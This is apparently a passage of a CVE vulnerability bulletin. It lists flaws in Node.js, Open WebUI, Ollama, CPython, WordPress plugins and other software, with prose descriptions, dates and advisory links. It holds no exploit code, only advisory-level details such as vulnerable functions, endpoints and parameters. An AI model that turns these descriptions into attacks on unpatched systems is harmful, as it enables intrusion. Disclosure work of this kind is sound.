| nodejs--node | We have identified a bug in Node.js error handling where "Maximum call stack size exceeded" errors become uncatchable when `async_hooks.createHook()` is enabled. Instead of reaching `process.on('uncaughtException')`, the process terminates, making the crash unrecoverable. Applications that rely on `AsyncLocalStorage` (v22, v20) or `async_hooks.createHook()` (v24, v22, v20) become vulnerable to denial-of-service crashes triggered by deep recursion under specific conditions. | 2026-01-20 | not yet calculated | CVE-2025-59466 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's permission model allows Unix Domain Socket (UDS) connections to bypass network restrictions when `--permission` is enabled. Even without `--allow-net`, attacker-controlled inputs (such as URLs or socketPath options) can connect to arbitrary local sockets via net, tls, or undici/fetch. This breaks the intended security boundary of the permission model and enables access to privileged local services, potentially leading to privilege escalation, data exposure, or local code execution. The issue affects users of the Node.js permission model on version v25. At the time of this vulnerability, network permissions (`--allow-net`) are still in the experimental phase. | 2026-01-20 | not yet calculated | CVE-2026-21636 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js TLS error handling allows remote attackers to crash or exhaust resources of a TLS server when `pskCallback` or `ALPNCallback` are in use. Synchronous exceptions thrown during these callbacks bypass standard TLS error handling paths (tlsClientError and error), causing either immediate process termination or silent file descriptor leaks that eventually lead to denial of service. Because these callbacks process attacker-controlled input during the TLS handshake, a remote client can repeatedly trigger the issue. This vulnerability affects TLS servers using PSK or ALPN callbacks across Node.js versions where these callbacks throw without being safely wrapped. | 2026-01-20 | not yet calculated | CVE-2026-21637 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| npm--cli | npm cli Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of modules. The application loads modules from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25430. | 2026-01-23 | not yet calculated | CVE-2026-0775 | ZDI-26-043 |
| NSquared--Simply Schedule Appointments | Missing Authorization vulnerability in NSquared Simply Schedule Appointments simply-schedule-appointments allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simply Schedule Appointments: from n/a through <= 1.6.9.15. | 2026-01-22 | not yet calculated | CVE-2025-69315 | https://patchstack.com/database/Wordpress/Plugin/simply-schedule-appointments/vulnerability/wordpress-simply-schedule-appointments-plugin-1-6-9-15-broken-access-control-vulnerability?_s_id=cve |
| Ollama MCP Server--Ollama MCP Server | Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683. | 2026-01-23 | not yet calculated | CVE-2025-15063 | ZDI-26-020 |
| ollama--ollama | An issue in ollama v.0.12.10 allows a remote attacker to cause a denial of service via the GGUF decoder. | 2026-01-21 | not yet calculated | CVE-2025-66959 | https://github.com/ollama/ollama/issues/9820 https://zero.shotlearni.ng/blog/cve-2025-66959panic-dos-via-unchecked-length-in-gguf-decoder-copy/ |
| ollama--ollama | An issue in ollama v.0.12.10 allows a remote attacker to cause a denial of service via fs/ggml/gguf.go, where the function readGGUFV1String reads a string length from untrusted GGUF metadata. | 2026-01-21 | not yet calculated | CVE-2025-66960 | https://github.com/ollama/ollama/issues/9820 https://zero.shotlearni.ng/blog/cve-2025-66960guf-v1-string-length-cause-panic-in-readggufv1string/ |
| OmniApp--OmniApp | An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource. | 2026-01-23 | not yet calculated | CVE-2025-69908 | https://newgensoft.com/ https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69908.md |
| OmniDocs--OmniDocs | An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials to retrieve sensitive internal configuration information, including cabinet names and database-related metadata. This allows unauthorized enumeration of backend deployment details and may facilitate further targeted attacks. | 2026-01-23 | not yet calculated | CVE-2025-69907 | https://newgensoft.com/ https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69907.md |
| omnipressteam--Omnipress | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion. This issue affects Omnipress: from n/a through <= 1.6.6. | 2026-01-23 | not yet calculated | CVE-2026-24538 | https://patchstack.com/database/Wordpress/Plugin/omnipress/vulnerability/wordpress-omnipress-plugin-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| Onepay Sri Lanka--onepay Payment Gateway For WooCommerce | Missing Authorization vulnerability in Onepay Sri Lanka onepay Payment Gateway For WooCommerce onepay-payment-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects onepay Payment Gateway For WooCommerce: from n/a through <= 1.1.2. | 2026-01-22 | not yet calculated | CVE-2025-68016 | https://patchstack.com/database/Wordpress/Plugin/onepay-payment-gateway-for-woocommerce/vulnerability/wordpress-onepay-payment-gateway-for-woocommerce-plugin-1-1-2-other-vulnerability-type-vulnerability?_s_id=cve |
| Open WebUI--Open WebUI | Open WebUI PIP install_frontmatter_requirements Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the install_frontmatter_requirements function. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28258. | 2026-01-23 | not yet calculated | CVE-2026-0765 | ZDI-26-031 |
| Open WebUI--Open WebUI | Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257. | 2026-01-23 | not yet calculated | CVE-2026-0766 | ZDI-26-032 |
| Open WebUI--Open WebUI | Open WebUI Cleartext Transmission of Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Open WebUI. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of credentials provided to the endpoint. The issue results from transmitting sensitive information in plaintext. An attacker can leverage this vulnerability to disclose transmitted credentials, leading to further compromise. Was ZDI-CAN-28259. | 2026-01-23 | not yet calculated | CVE-2026-0767 | ZDI-26-033 |
| OpenSolution--Quick.Cart | Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim's browser. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2026-01-22 | not yet calculated | CVE-2025-67683 | https://cert.pl/posts/2026/01/CVE-2025-67683 https://opensolution.org/sklep-internetowy-quick-cart.html |
| OpenSolution--Quick.Cart | Quick.Cart is vulnerable to Local File Inclusion and Path Traversal issues in the theme selection mechanism. Quick.Cart allows a privileged user to upload arbitrary file contents while only validating the filename extension. This allows an attacker to include and execute uploaded PHP code, resulting in Remote Code Execution on the server. The vendor was notified early about this vulnerability but did not respond with details of the vulnerability or the vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2026-01-22 | not yet calculated | CVE-2025-67684 | https://cert.pl/posts/2026/01/CVE-2025-67683 https://opensolution.org/sklep-internetowy-quick-cart.html |
| orjson--orjson | The orjson.dumps function in orjson thru 3.11.4 does not limit recursion for deeply nested JSON documents. | 2026-01-22 | not yet calculated | CVE-2025-67221 | https://github.com/kpatsakis/orjson_vulnerability https://github.com/ijl/orjson |
| orval-labs--orval | Orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Versions prior to 7.19.0 until 8.0.2 are vulnerable to arbitrary code execution in environments consuming generated clients. This issue is similar in nature to CVE-2026-22785, but affects a different code path in @orval/core that was not addressed by CVE-2026-22785's fix. The vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript code into generated clients via the x-enumDescriptions field, which is embedded without proper escaping in getEnumImplementation(). I have confirmed that the injection occurs during const enum generation and results in executable code within the generated schema files. Orval 7.19.0 and 8.0.2 contain a fix for the issue. | 2026-01-20 | not yet calculated | CVE-2026-23947 | https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv https://github.com/orval-labs/orval/releases/tag/v8.0.2 |
| orval-labs--orval | Orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Versions 7.19.0 and below and 8.0.0-rc.0 through 8.0.2 allow untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. The vulnerability is similar in impact to the previously reported enum x-enumDescriptions (GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core. The issue has been fixed in versions 7.20.0 and 8.0.3. | 2026-01-22 | not yet calculated | CVE-2026-24132 | https://github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626 https://github.com/orval-labs/orval/pull/2828 https://github.com/orval-labs/orval/pull/2829 https://github.com/orval-labs/orval/pull/2830 https://github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5 https://github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06 https://github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62 https://github.com/orval-labs/orval/releases/tag/v7.20.0 https://github.com/orval-labs/orval/releases/tag/v8.0.3 |
| ovatheme--Athens | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ovatheme Athens athens allows PHP Local File Inclusion. This issue affects Athens: from n/a through <= 1.1.6. | 2026-01-22 | not yet calculated | CVE-2025-49994 | https://patchstack.com/database/Wordpress/Theme/athens/vulnerability/wordpress-athens-theme-1-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| ovatheme--Movie Booking | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ovatheme Movie Booking movie-booking allows Path Traversal. This issue affects Movie Booking: from n/a through <= 1.1.5. | 2026-01-22 | not yet calculated | CVE-2025-67963 | https://patchstack.com/database/Wordpress/Plugin/movie-booking/vulnerability/wordpress-movie-booking-plugin-1-1-5-arbitrary-file-deletion-vulnerability?_s_id=cve |
| owntone--owntone | A NULL pointer dereference in the parse_meta function (src/httpd_daap.c) of owntone-server commit 334beb allows attackers to cause a Denial of Service (DoS) via sending a crafted DAAP request to the server. | 2026-01-20 | not yet calculated | CVE-2025-63647 | https://github.com/archersec/poc/tree/master/owntone-server https://github.com/owntone/owntone-server/commit/53ee9a3c3921e5448f502800c4dfa787865f6cb7 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| Paolo--GeoDirectory | Cross-Site Request Forgery (CSRF) vulnerability in Paolo GeoDirectory geodirectory allows Cross Site Request Forgery. This issue affects GeoDirectory: from n/a through <= 2.8.147. | 2026-01-23 | not yet calculated | CVE-2026-24549 | https://patchstack.com/database/Wordpress/Plugin/geodirectory/vulnerability/wordpress-geodirectory-plugin-2-8-147-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Passionate Brains--Add Expires Headers & Optimized Minify | Missing Authorization vulnerability in Passionate Brains Add Expires Headers & Optimized Minify add-expires-headers allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Add Expires Headers & Optimized Minify: from n/a through <= 3.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24633 | https://patchstack.com/database/Wordpress/Plugin/add-expires-headers/vulnerability/wordpress-add-expires-headers-optimized-minify-plugin-3-1-0-broken-access-control-vulnerability?_s_id=cve |
| pavothemes--Freshio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Freshio freshio allows PHP Local File Inclusion. This issue affects Freshio: from n/a through <= 2.4.2. | 2026-01-22 | not yet calculated | CVE-2026-22401 | https://patchstack.com/database/Wordpress/Theme/freshio/vulnerability/wordpress-freshio-theme-2-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| pavothemes--Triply | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Triply triply allows PHP Local File Inclusion. This issue affects Triply: from n/a through <= 2.4.7. | 2026-01-22 | not yet calculated | CVE-2026-22402 | https://patchstack.com/database/Wordpress/Theme/triply/vulnerability/wordpress-triply-theme-2-4-7-local-file-inclusion-vulnerability?_s_id=cve |
| peachpayments--Peach Payments Gateway | Missing Authorization vulnerability in peachpayments Peach Payments Gateway wc-peach-payments-gateway allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Peach Payments Gateway: from n/a through <= 3.3.6. | 2026-01-22 | not yet calculated | CVE-2025-67942 | https://patchstack.com/database/Wordpress/Plugin/wc-peach-payments-gateway/vulnerability/wordpress-peach-payments-gateway-plugin-3-3-6-broken-access-control-vulnerability?_s_id=cve |
| PenciDesign--Penci Pay Writer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Pay Writer penci-pay-writer allows Stored XSS. This issue affects Penci Pay Writer: from n/a through <= 1.5. | 2026-01-23 | not yet calculated | CVE-2026-24601 | https://patchstack.com/database/Wordpress/Plugin/penci-pay-writer/vulnerability/wordpress-penci-pay-writer-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PenciDesign--Penci Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS. This issue affects Penci Review: from n/a through <= 3.5. | 2026-01-23 | not yet calculated | CVE-2026-24600 | https://patchstack.com/database/Wordpress/Plugin/penci-review/vulnerability/wordpress-penci-review-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PenciDesign--Penci Shortcodes & Performance | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Shortcodes & Performance penci-shortcodes allows DOM-Based XSS. This issue affects Penci Shortcodes & Performance: from n/a through <= 6.1. | 2026-01-22 | not yet calculated | CVE-2026-24354 | https://patchstack.com/database/Wordpress/Plugin/penci-shortcodes/vulnerability/wordpress-penci-shortcodes-performance-plugin-6-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| pencilwp--X Addons for Elementor | Missing Authorization vulnerability in pencilwp X Addons for Elementor x-addons-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects X Addons for Elementor: from n/a through <= 1.0.23. | 2026-01-23 | not yet calculated | CVE-2026-24605 | https://patchstack.com/database/Wordpress/Plugin/x-addons-elementor/vulnerability/wordpress-x-addons-for-elementor-plugin-1-0-23-broken-access-control-vulnerability?_s_id=cve |
| PHPgurukul--PHPgurukul | PHPgurukul Online Course Registration v3.1 lacks Cross-Site Request Forgery (CSRF) protection on all administrative forms. An attacker can perform unauthorized actions on behalf of authenticated administrators by tricking them into visiting a malicious webpage. | 2026-01-22 | not yet calculated | CVE-2025-70899 | https://phpgurukul.com/online-course-registration-free-download/ https://github.com/mathavamoorthi/CVE-2025-70899/blob/main/Missing_CSRF_protection_poc.md |
| Pithikos--Pithikos | An input validation issue in Pithikos websocket-server v.0.6.4 allows a remote attacker to obtain sensitive information or cause unexpected server behavior via the websocket_server/websocket_server.py, WebSocketServer._message_received components. | 2026-01-20 | not yet calculated | CVE-2025-66902 | https://github.com/cyberinvest211/websocket-server-vuln-poc/tree/main |
| pixelgrade--Nova Blocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pixelgrade Nova Blocks nova-blocks allows DOM-Based XSS. This issue affects Nova Blocks: from n/a through <= 2.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24528 | https://patchstack.com/database/Wordpress/Plugin/nova-blocks/vulnerability/wordpress-nova-blocks-plugin-2-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PluginOps--Landing Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PluginOps Landing Page Builder page-builder-add allows Stored XSS. This issue affects Landing Page Builder: from n/a through <= 1.5.3.3. | 2026-01-23 | not yet calculated | CVE-2026-24620 | https://patchstack.com/database/Wordpress/Plugin/page-builder-add/vulnerability/wordpress-landing-page-builder-plugin-1-5-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pondol--Pondol BBS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pondol Pondol BBS pondol-bbs allows Stored XSS. This issue affects Pondol BBS: from n/a through <= 1.1.8.4. | 2026-01-22 | not yet calculated | CVE-2025-49336 | https://patchstack.com/database/Wordpress/Plugin/pondol-bbs/vulnerability/wordpress-pondol-bbs-plugin-1-1-8-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PopCash--PopCash.Net Code Integration Tool | Missing Authorization vulnerability in PopCash PopCash.Net Code Integration Tool popcashnet-code-integration-tool allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PopCash.Net Code Integration Tool: from n/a through <= 1.8. | 2026-01-23 | not yet calculated | CVE-2026-24619 | https://patchstack.com/database/Wordpress/Plugin/popcashnet-code-integration-tool/vulnerability/wordpress-popcash-net-code-integration-tool-plugin-1-8-broken-access-control-vulnerability?_s_id=cve |
| POSIMYTH--Nexter Blocks | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in POSIMYTH Nexter Blocks the-plus-addons-for-block-editor allows Retrieve Embedded Sensitive Data. This issue affects Nexter Blocks: from n/a through <= 4.6.3. | 2026-01-22 | not yet calculated | CVE-2026-24377 | https://patchstack.com/database/Wordpress/Plugin/the-plus-addons-for-block-editor/vulnerability/wordpress-nexter-blocks-plugin-4-6-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Poultry Farm Management System--Poultry Farm Management System | Stored Cross-Site Scripting (XSS) in Poultry Farm Management System v1.0 due to the lack of proper validation of user input by sending a POST request. The relationship between parameters and assigned identifiers is as follows: 'companyaddress', 'companyemail', 'companyname', 'country', 'mobilenumber' and 'regno' parameters in '/farm/farmprofile.php'. | 2026-01-20 | not yet calculated | CVE-2025-41024 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-poultry-farm-management-system |
| Poultry Farm Management System--Poultry Farm Management System | Stored Cross-Site Scripting (XSS) in Poultry Farm Management System v1.0 due to the lack of proper validation of user input by sending a POST request. The relationship between parameters and assigned identifiers is as follows: 'category' and 'product' parameters in '/farm/sell_product.php'. | 2026-01-20 | not yet calculated | CVE-2025-41025 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-poultry-farm-management-system |
| Prince--Integrate Google Drive | Missing Authorization vulnerability in Prince Integrate Google Drive integrate-google-drive allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Integrate Google Drive: from n/a through <= 1.5.5. | 2026-01-23 | not yet calculated | CVE-2026-24540 | https://patchstack.com/database/Wordpress/Plugin/integrate-google-drive/vulnerability/wordpress-integrate-google-drive-plugin-1-5-5-broken-access-control-vulnerability?_s_id=cve |
| Prince--Radio Player | Server-Side Request Forgery (SSRF) vulnerability in Prince Radio Player radio-player allows Server Side Request Forgery. This issue affects Radio Player: from n/a through <= 2.0.91. | 2026-01-23 | not yet calculated | CVE-2026-24548 | https://patchstack.com/database/Wordpress/Plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-91-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Proptech Plugin--Apimo Connector | Missing Authorization vulnerability in Proptech Plugin Apimo Connector apimo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Apimo Connector: from n/a through <= 2.6.4. | 2026-01-22 | not yet calculated | CVE-2026-22445 | https://patchstack.com/database/Wordpress/Plugin/apimo/vulnerability/wordpress-apimo-connector-plugin-2-6-4-broken-access-control-vulnerability?_s_id=cve |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Pterodactyl implements rate limits that are applied to the total number of resources (e.g. databases, port allocations, or backups) that can exist for an individual server. These resource limits are applied on a per-server basis, and validated during the request cycle. However, in versions prior to 1.12.0, it is possible for a malicious user to send a massive volume of requests at the same time that would create more resources than the server is allotted. This is because the validation occurs early in the request cycle and does not lock the target resource while it is processing. As a result sending a large volume of requests at the same time would lead all of those requests to validate as not using any of the target resources, and then all creating the resources at the same time. As a result a server would be able to create more databases, allocations, or backups than configured. A malicious user is able to deny resources to other users on the system, and may be able to excessively consume the limited allocations for a node, or fill up backup space faster than is allowed by the system. Version 1.12.0 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2025-69198 | https://github.com/pterodactyl/panel/security/advisories/GHSA-jw2v-cq5x-q68g https://github.com/pterodactyl/panel/commit/09caa0d4995bd924b53b9a9e9b4883ac27bd5607 |
| pterodactyl--panel | Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to version 1.12.0, websockets within Wings lack proper rate limiting and throttling. As a result, a malicious user can open a large number of connections and then request data through these sockets, causing an excessive volume of data over the network and overloading the host system memory and CPU. Additionally, there is no limit applied to the total size of messages being sent or received, allowing a malicious user to open thousands of websocket connections and then send massive volumes of information over the socket, overloading the host network and causing increased CPU and memory load within Wings. Version 1.12.0 patches the issue. | 2026-01-19 | not yet calculated | CVE-2025-69199 | https://github.com/pterodactyl/panel/security/advisories/GHSA-8w7m-w749-rx98 |
| pterodactyl--wings | Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Starting in version 1.7.0 and prior to version 1.12.0, Wings does not consider the SQLite max parameter limit when processing activity log entries, allowing a low-privileged user to trigger a condition that floods the panel with activity records. After Wings sends activity logs to the panel it deletes the processed activity entries from the Wings SQLite database. However, it does not consider the max parameter limit of SQLite, 32766 as of SQLite 3.32.0. If Wings attempts to delete more than 32766 entries from the SQLite database in one query, it triggers an error (SQL logic error: too many SQL variables (1)) and does not remove any entries from the database. These entries are then indefinitely re-processed and resent to the panel each time the cron runs. By successfully exploiting this vulnerability, an attacker can trigger a situation where Wings will keep uploading the same activity data to the panel repeatedly (growing each time to include new activity) until the panel's database server runs out of disk space. Version 1.12.0 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-21696 | https://github.com/pterodactyl/wings/security/advisories/GHSA-2497-gp99-2m74 https://github.com/pterodactyl/wings/blob/9ffbcdcdb1163da823cf9959b9602df9f7dcb54a/internal/cron/activity_cron.go#L81 https://github.com/pterodactyl/wings/blob/9ffbcdcdb1163da823cf9959b9602df9f7dcb54a/internal/cron/sftp_cron.go#L86 |
| purethemes--WorkScout | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout workscout allows Reflected XSS. This issue affects WorkScout: from n/a through <= 4.1.07. | 2026-01-22 | not yet calculated | CVE-2025-67959 | https://patchstack.com/database/Wordpress/Theme/workscout/vulnerability/wordpress-workscout-theme-4-1-07-cross-site-scripting-xss-vulnerability?_s_id=cve |
| purethemes--WorkScout-Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS. This issue affects WorkScout-Core: from n/a through <= 1.7.06. | 2026-01-22 | not yet calculated | CVE-2025-67960 | https://patchstack.com/database/Wordpress/Plugin/workscout-core/vulnerability/wordpress-workscout-core-plugin-1-7-06-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| PyPI--PiPI | An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. | 2026-01-20 | not yet calculated | CVE-2025-56005 | https://github.com/bohmiiidd/Undocumented-RCE-in-PLY |
| Python Software Foundation--CPython | When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized. | 2026-01-20 | not yet calculated | CVE-2025-11468 | https://github.com/python/cpython/pull/143936 https://github.com/python/cpython/issues/143935 https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/ https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2 |
| Python Software Foundation--CPython | When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the "base64" module, the characters "+/" will always be accepted, regardless of the value of the "altchars" parameter, typically used to establish an "alternative base64 alphabet" such as the URL-safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues. This behavior can only be insecure if your application uses an alternate base64 alphabet (without "+/"). If your application does not use the "altchars" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet. The attached patches DO NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior, which will be replaced with the newly recommended behavior in a future version of Python. Users are recommended to mitigate by verifying that user-controlled inputs match the base64 alphabet they are expecting, or by verifying that their application would not be affected if the b64decode() functions accepted "+" or "/" outside of altchars. | 2026-01-21 | not yet calculated | CVE-2025-12781 | https://github.com/python/cpython/pull/141128 https://github.com/python/cpython/issues/125346 https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/ https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947 https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5 https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76 https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5 |
| Python Software Foundation--CPython | User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype. | 2026-01-20 | not yet calculated | CVE-2025-15282 | https://github.com/python/cpython/pull/143926 https://github.com/python/cpython/issues/143925 https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/ https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0 |
| Python Software Foundation--CPython | The imaplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters. | 2026-01-20 | not yet calculated | CVE-2025-15366 | https://github.com/python/cpython/issues/143921 https://github.com/python/cpython/pull/143922 https://mail.python.org/archives/list/security-announce@python.org/thread/DD7C7JZJYTBXMDOWKCEIEBJLBRU64OMR/ https://github.com/python/cpython/commit/6262704b134db2a4ba12e85ecfbd968534f28b45 |
| Python Software Foundation--CPython | The poplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters. | 2026-01-20 | not yet calculated | CVE-2025-15367 | https://github.com/python/cpython/pull/143924 https://github.com/python/cpython/issues/143923 https://mail.python.org/archives/list/security-announce@python.org/thread/CBFBOWVGGUJFSGITQCCBZS4GEYYZ7ZNE/ https://github.com/python/cpython/commit/b234a2b67539f787e191d2ef19a7cbdce32874e7 |
| Python Software Foundation--CPython | When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters. | 2026-01-20 | not yet calculated | CVE-2026-0672 | https://github.com/python/cpython/pull/143920 https://github.com/python/cpython/issues/143919 https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/ https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70 https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440 |
| Python Software Foundation--CPython | User-controlled header names and values containing newlines can allow injecting HTTP headers. | 2026-01-20 | not yet calculated | CVE-2026-0865 | https://github.com/python/cpython/pull/143917 https://github.com/python/cpython/issues/143916 https://mail.python.org/archives/list/security-announce@python.org/thread/BJ6QPHNSHJTS3A7CFV6IBMCAP2DWRVNT/ https://github.com/python/cpython/commit/22e4d55285cee52bc4dbe061324e5f30bd4dee58 https://github.com/python/cpython/commit/23e3c0ae867cca0130e441e776c9955b9027c510 https://github.com/python/cpython/commit/4802b96a2cde58570c24c13ef3289490980961c5 https://github.com/python/cpython/commit/f7fceed79ca1bceae8dbe5ba5bc8928564da7211 https://github.com/python/cpython/commit/2f840249550e082dc351743f474ba56da10478d2 https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995 |
